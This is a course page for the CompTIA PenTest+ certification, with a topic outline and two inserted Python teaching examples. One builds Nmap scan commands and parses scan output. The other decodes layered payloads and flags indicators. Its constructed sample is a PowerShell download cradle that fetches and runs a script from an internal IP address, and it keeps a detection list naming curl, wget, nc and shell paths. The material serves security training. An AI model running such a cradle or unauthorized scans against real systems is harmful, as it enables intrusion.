CompTIA PenTest+ Certification

Audience

CompTIA PenTest+ is a certification for intermediate-level cybersecurity professionals who are tasked with hands-on penetration testing to identify, exploit, report, and manage vulnerabilities on a network. It is ideal for:

  • Penetration Testers
  • Vulnerability Testers
  • Security Analysts
  • Vulnerability Assessment Analysts
  • Network Security Operations Personnel
  • Application Security Vulnerability Personnel

Prerequisites

While there are no required prerequisites, the following are recommended:

Duration

3 days. Hands-on.

Course Objectives

CompTIA PenTest+ assesses the most up-to-date penetration testing, vulnerability assessment, and vulnerability management skills necessary to determine the resiliency of a network against attacks.

The CompTIA PenTest+ certification (Exam PT0-001) verifies that successful candidates have the knowledge and skills required to plan and scope an assessment, understand legal and compliance requirements, perform vulnerability scanning and penetration testing, analyze data, effectively report and communicate results, and provide practical recommendations.

The exam can be taken as part of the course and includes both hands-on, performance-based questions and multiple-choice questions, to ensure each candidate possesses the skills, knowledge, and ability to perform tasks on systems. It also covers the management skills used to plan and scope an engagement and to manage weaknesses, not just exploit them. PenTest+ is unique because candidates are required to demonstrate the ability and knowledge to test devices in newer environments such as the cloud and mobile, in addition to traditional desktops and servers.

What skills will you learn?

  • Planning and Scoping - Explain the importance of planning and key aspects of compliance-based assessments
  • Information Gathering and Vulnerability Identification - Gather information to prepare for exploitation then perform a vulnerability scan and analyze results
  • Attacks and Exploits - Exploit network, wireless, application, and RF-based vulnerabilities, summarize physical security attacks, and perform post-exploitation techniques
  • Penetration Testing Tools - Conduct information gathering exercises with various tools and analyze output and basic scripts (limited to: Bash, Python, Ruby, PowerShell)
  • Reporting and Communication - Utilize report writing and handling best practices explaining recommended mitigation strategies for discovered vulnerabilities

Course Content

Planning and Scoping

Explain the importance of planning for an engagement
Understanding the target audience
Rules of engagement
Communication escalation path
Resources and requirements
Budget
Impact analysis and remediation timelines
Disclaimers
Technical constraints
Support resources

Explain key legal concepts
Contracts
Environmental differences
Written authorization

Explain the importance of scoping an engagement properly
Types of assessment
Special scoping considerations
Target selection
Strategy
Risk acceptance
Tolerance to impact
Scheduling
Scope creep
Threat actors

Explain the key aspects of compliance-based assessments
Compliance-based assessments, limitations, and caveats
Clearly defined objectives based on regulations

Information Gathering and Vulnerability Identification

Given a scenario, conduct information gathering using appropriate techniques
Scanning
Enumeration
Packet crafting
Packet inspection
Fingerprinting
Cryptography
Eavesdropping
Decompilation
Debugging
Open Source Intelligence Gathering

Given a scenario, perform a vulnerability scan
Credentialed vs. non-credentialed
Types of scans
Container security
Application scan
Considerations of vulnerability scanning

Given a scenario, analyze vulnerability scan results
Asset categorization
Adjudication
Prioritization of vulnerabilities
Common themes

Explain the process of leveraging information to prepare for exploitation
Map vulnerabilities to potential exploits
Prioritize activities in preparation for penetration test
Describe common techniques to complete an attack

Explain weaknesses related to specialized systems
ICS
SCADA
Mobile
IoT
Embedded
Point-of-sale system
Biometrics
Application containers
RTOS

Attacks and Exploits

Compare and contrast social engineering attacks
Phishing
Elicitation
Interrogation
Impersonation
Shoulder surfing
USB key drop
Motivation techniques

Given a scenario, exploit network-based vulnerabilities
Name resolution exploits
SMB exploits
SNMP exploits
SMTP exploits
FTP exploits
DNS cache poisoning
Pass the hash
Man-in-the-middle
DoS/stress test
NAC bypass
VLAN hopping

Given a scenario, exploit wireless and RF-based vulnerabilities
Evil twin
Deauthentication attacks
Fragmentation attacks
Credential harvesting
WPS implementation weakness
Bluejacking
Bluesnarfing
RFID cloning
Jamming
Repeating

Given a scenario, exploit application-based vulnerabilities
Injections
Authentication
Authorization
Cross-site scripting (XSS)
Cross-site request forgery (CSRF/XSRF)
Clickjacking
Security misconfiguration
File inclusion
Unsecure code practices

Given a scenario, exploit local host vulnerabilities
OS vulnerabilities
Unsecure service and protocol configurations
Privilege escalation
Default account settings
Sandbox escape
Physical device security

Summarize physical security attacks related to facilities
Piggybacking/tailgating
Fence jumping
Dumpster diving
Lock picking
Lock bypass
Egress sensor
Badge cloning

Given a scenario, perform post-exploitation techniques
Lateral movement
Persistence
Covering your tracks

Penetration Testing Tools

Given a scenario, use Nmap to conduct information gathering exercises
SYN scan (-sS) vs. full connect scan (-sT)
Port selection (-p)
Service identification (-sV)
OS fingerprinting (-O)
Disabling ping (-Pn)
Target input file (-iL)
Timing (-T)
Output parameters
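The Nmap options listed above are normally combined into a single command whose XML output (-oX, or -oA for all three formats) is then parsed rather than read by eye. The following is an added example, not course or CompTIA material: it assembles such a command line and parses a hand-constructed sample of Nmap's XML output into per-host records. The XML sample, the file name targets.txt and the output prefix "scan" are all assumptions made for the example.

```python
"""Build an Nmap command from the options listed above and parse -oX output.

Added example; SAMPLE_XML is constructed by hand in the layout Nmap emits
with -oX and is not real scan output.
"""
import shlex
import xml.etree.ElementTree as ET


def build_nmap_command(target_file, ports="1-1024", scan_type="-sS", timing=4, out_prefix="scan"):
    """Return argv for a SYN scan with service and OS detection.

    -sS SYN scan (use -sT, a full TCP connect, when not running as root),
    -p port list, -sV service identification, -O OS fingerprinting,
    -Pn skip host discovery, -iL read targets from a file, -T timing
    template 0-5, -oA write normal, grepable and XML output under one prefix.
    """
    if scan_type not in ("-sS", "-sT"):
        raise ValueError("scan_type must be -sS or -sT")
    if not 0 <= timing <= 5:
        raise ValueError("timing template must be 0-5")
    return ["nmap", scan_type, "-p", ports, "-sV", "-O", "-Pn",
            f"-T{timing}", "-iL", target_file, "-oA", out_prefix]


# Constructed sample in Nmap's -oX layout (not real output).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -p 1-1024 -sV -O -Pn -iL targets.txt -oA scan">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="80"><state state="filtered"/></port>
    </ports>
    <os><osmatch name="Linux 3.X" accuracy="95"/></os>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one record per live host: address, OS guess and open ports."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # with -Pn every target is reported up; without it, down hosts are skipped
        addr = host.find("address[@addrtype='ipv4']")
        open_ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports are not attack surface
            svc = port.find("service")
            banner = ""
            if svc is not None:
                banner = " ".join(filter(None, [svc.get("name"), svc.get("product"), svc.get("version")]))
            open_ports.append((int(port.get("portid")), port.get("protocol"), banner))
        osmatch = host.find("os/osmatch")
        hosts.append({
            "address": addr.get("addr") if addr is not None else None,
            "os": osmatch.get("name") if osmatch is not None else None,
            "os_accuracy": int(osmatch.get("accuracy")) if osmatch is not None else 0,
            "open_ports": sorted(open_ports),
        })
    return hosts


def smb_hosts(hosts):
    """Addresses exposing 445/tcp, the targets for the SMB checks in the Attacks section."""
    return [h["address"] for h in hosts if any(p == 445 for p, _, _ in h["open_ports"])]


if __name__ == "__main__":
    print(shlex.join(build_nmap_command("targets.txt")))
    for record in parse_nmap_xml(SAMPLE_XML):
        print(record)
    print("SMB hosts:", smb_hosts(parse_nmap_xml(SAMPLE_XML)))
```

The parser keeps only ports in state "open"; filtered ports tell you a firewall is in the path but give nothing to exploit, and a credentialed follow-up scan or a -sT retry is the usual next step for them.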

Compare and contrast various use cases of tools
Use cases
Tools

Given a scenario, analyze tool output or data related to a penetration test
Password cracking
Pass the hash
Setting up a bind shell
Getting a reverse shell
Proxying a connection
Uploading a web shell
Injections

Given a scenario, analyze a basic script (limited to Bash, Python, Ruby, and PowerShell)
Logic
I/O
Substitutions
Variables
Common operations
Error handling
Arrays
Encoding/decoding
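A short script that uses the elements listed above, as an added example and not course or CompTIA material: variables, a list used as an array, f-string substitution, try/except error handling, and the encoding/decoding that pentesters meet when a payload is hidden in a dropper or in tool output. It peels URL, hex and base64 layers off a string until plain text remains and then flags suspicious commands. The sample payload (a PowerShell download cradle and the host 10.0.0.9) is constructed for the example.

```python
"""Peel encoding layers off a payload found in a script or tool output.

Added example: a basic Python script built from the elements the outline
lists (variables, lists, substitution, error handling, encoding/decoding).
The sample payload is constructed here and is not from any engagement.
"""
import base64
import binascii
import re
import urllib.parse

HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Strings worth a second look when they appear in decoded content (an array of indicators).
INDICATORS = ["IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
              "curl ", "wget ", "nc ", "/bin/sh", "cmd.exe"]


def _bytes_to_text(raw):
    """Decode as UTF-16LE when every odd byte is NUL (the encoding PowerShell's
    -EncodedCommand uses), otherwise as UTF-8."""
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def try_decode_once(text):
    """Strip one encoding layer. Returns (layer_name, decoded_text), or None
    when the text does not look encoded."""
    if "%" in text and urllib.parse.unquote(text) != text:
        return "url", urllib.parse.unquote(text)
    if HEX_RE.match(text):
        try:
            decoded = _bytes_to_text(bytes.fromhex(text))
            if decoded.isprintable():
                return "hex", decoded
        except (ValueError, UnicodeDecodeError):
            pass  # looked like hex but did not decode to text
    if len(text) % 4 == 0 and B64_RE.match(text):
        try:
            decoded = _bytes_to_text(base64.b64decode(text, validate=True))
            if decoded.isprintable():
                return "base64", decoded
        except (binascii.Error, ValueError, UnicodeDecodeError):
            pass  # looked like base64 but did not decode to text
    return None


def decode_layers(blob, max_depth=5):
    """Repeatedly strip layers until plain text remains.

    Returns (list_of_layer_names, final_text); max_depth bounds the loop so
    a string that keeps looking encoded cannot spin forever.
    """
    layers = []
    current = blob.strip()
    for _ in range(max_depth):
        step = try_decode_once(current)
        if step is None:
            break
        name, decoded = step
        layers.append(name)
        current = decoded.strip()
    return layers, current


def flag_indicators(text):
    """Return the INDICATORS present in text, in list order."""
    return [word for word in INDICATORS if word in text]


# Constructed sample: a PowerShell download cradle, UTF-16LE encoded, then
# base64, then hex, as it might sit inside a dropper script.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.9/a.ps1")'
SAMPLE_PAYLOAD = binascii.hexlify(base64.b64encode(CRADLE.encode("utf-16-le"))).decode()

if __name__ == "__main__":
    layers, plain = decode_layers(SAMPLE_PAYLOAD)
    print(f"layers: {' -> '.join(layers)}")   # substitution into an f-string
    print(f"plain : {plain}")
    print(f"flags : {flag_indicators(plain)}")
```

The isprintable() check after each decode is what stops the script from treating an ordinary word such as "deadbeef" as an encoded layer; without it, short alphanumeric tokens decode to binary garbage and the loop walks off in the wrong direction.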

Reporting and Communication

Given a scenario, use report writing and handling best practices
Normalization of data
Written report of findings and remediation
Risk appetite
Storage time for report
Secure handling and disposition of reports

Explain post-report delivery activities
Post-engagement cleanup
Client acceptance
Lessons learned
Follow-up actions/retest
Attestation of findings

Given a scenario, recommend mitigation strategies for discovered vulnerabilities
Solutions
Findings
Remediation

Explain the importance of communication during the penetration testing process
Communication path
Communication triggers
Reasons for communication
Goal reprioritization

Virtual Courses

ALL of our courses can be delivered virtually, and our Bath public schedule of courses is now available as live virtual sessions using the Zoom Virtual Classroom and remote labs. Delegates can test their access at: www.zoom.us/test

Public Courses

On-Site Courses

Can't attend one of our public classes? Booking for multiple people?

All our courses are available on your site! Delivered for your staff, at your premises.

Contact us to find out more...